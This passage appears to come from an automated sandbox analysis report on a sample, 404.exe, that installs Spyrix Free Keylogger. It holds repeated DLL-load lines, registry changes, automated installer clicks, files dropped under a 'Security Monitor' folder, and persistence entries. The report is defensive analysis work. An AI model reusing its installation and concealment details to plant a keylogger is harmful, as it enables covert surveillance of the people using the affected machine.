            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
            Source: Spyrix Free Keylogger.lnk.13.drLNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
            Source: Uninstall Spyrix Free Keylogger.lnk.13.drLNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\unins000.exe
            Source: Spyrix Free Keylogger.lnk0.13.drLNK file: ..\..\..\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile written: C:\ProgramData\Spyrix Free Keylogger\temp\logger.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpWindow found: window name: TSelectLanguageFormJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: I accept the agreement
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: I accept the agreement
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: Install
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: I accept the agreement
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpAutomated click: I accept the agreement
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeAutomated click: Next >
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeAutomated click: Next >
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\404.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 404.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 404.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: 404.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 404.exeStatic PE information: 0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name:
            Source: is-A63B5.tmp.13.drStatic PE information: section name: .d
            Source: is-A63B5.tmp.13.drStatic PE information: section name: .adata
            Source: is-KK513.tmp.13.drStatic PE information: section name: .rodata
            Source: is-KK513.tmp.13.drStatic PE information: section name: .rotext
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name:
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: .adata
            Source: is-BG5BA.tmp.13.drStatic PE information: section name: .didata
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /4
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /19
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /31
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /45
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /57
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /70
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /81
            Source: is-DN3K6.tmp.13.drStatic PE information: section name: /92
            Source: ffws.exe.51.drStatic PE information: section name: .rodata
            Source: ffws.exe.51.drStatic PE information: section name: .rotext
            Source: C:\Users\user\Desktop\404.exeCode function: 0_2_083EFDD8 push esp; retf 0_2_083EFDD9
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_007B16A4 push 007B17DEh; ret 51_2_007B17D6
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_008650DC push 00865161h; ret 51_2_00865159
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00865B30 push 00865BB6h; ret 51_2_00865BAE
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086DEA3 push cs; ret 51_2_0086DEB4
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_008660D4 push 0086613Ch; ret 51_2_00866134
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086D2D4 push cs; iretd 51_2_0086D3AA
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00872002 push 00000075h; retf 51_2_00872004
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00874401 push ecx; ret 51_2_00874402
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00869C0D push eax; ret 51_2_00869C8D
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086524C push 008652D7h; ret 51_2_008652CF
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086D586 push ebx; ret 51_2_0086D587
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00865188 push 00865230h; ret 51_2_00865228
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_008675AC push 008675D9h; ret 51_2_008675D1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_0086D3D6 push cs; iretd 51_2_0086D3AA
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00865DFC push 00865E74h; ret 51_2_00865E6C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_00867550 push 0086759Ah; ret 51_2_00867592
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033FE001 push eax; ret 51_2_033FE108
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033FE001 push 033E4EC0h; ret 51_2_033FE5D1
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033DD398 push 033DD3C4h; ret 51_2_033DD3BC
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D73F8 push 033D7424h; ret 51_2_033D741C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033E03E4 push 033E0410h; ret 51_2_033E0408
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033C5238 push 033C5264h; ret 51_2_033C525C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D5224 push 033D5266h; ret 51_2_033D525E
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033C5200 push 033C522Ch; ret 51_2_033C5224
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D52A8 push 033D52D4h; ret 51_2_033D52CC
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D52E0 push 033D530Ch; ret 51_2_033D5304
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033D011C push 033D0154h; ret 51_2_033D014C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033CE108 push 033CE134h; ret 51_2_033CE12C
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033C5144 push 033C517Ch; ret 51_2_033C5174
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exeCode function: 51_2_033CD1A8 push 033CD1F4h; ret 51_2_033CD1EC
            Source: 404.exeStatic PE information: section name: .text entropy: 7.81759162350406
            Source: is-A63B5.tmp.13.drStatic PE information: section name: entropy: 7.970560832581065
            Source: is-A63B5.tmp.13.drStatic PE information: section name: entropy: 7.995359849273399
            Source: is-A63B5.tmp.13.drStatic PE information: section name: entropy: 7.98989686324796
            Source: is-A63B5.tmp.13.drStatic PE information: section name: entropy: 7.581553890924904
            Source: is-A63B5.tmp.13.drStatic PE information: section name: entropy: 7.998441689187187
            Source: is-A63B5.tmp.13.drStatic PE information: section name: .d entropy: 7.923610064617086
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: entropy: 7.972249623981622
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: entropy: 7.99458999281375
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: entropy: 7.992015849394924
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: entropy: 7.515192733866904
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: entropy: 7.998936896615619
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: .rsrc entropy: 7.953583660494071
            Source: is-F1LPA.tmp.13.drStatic PE information: section name: .data entropy: 7.561972396742998

            Persistence and Installation Behavior

            barindex
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: reg.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpProcess created: reg.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-F1LPA.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\ssleay32.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmpFile created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)Jump to dropped file
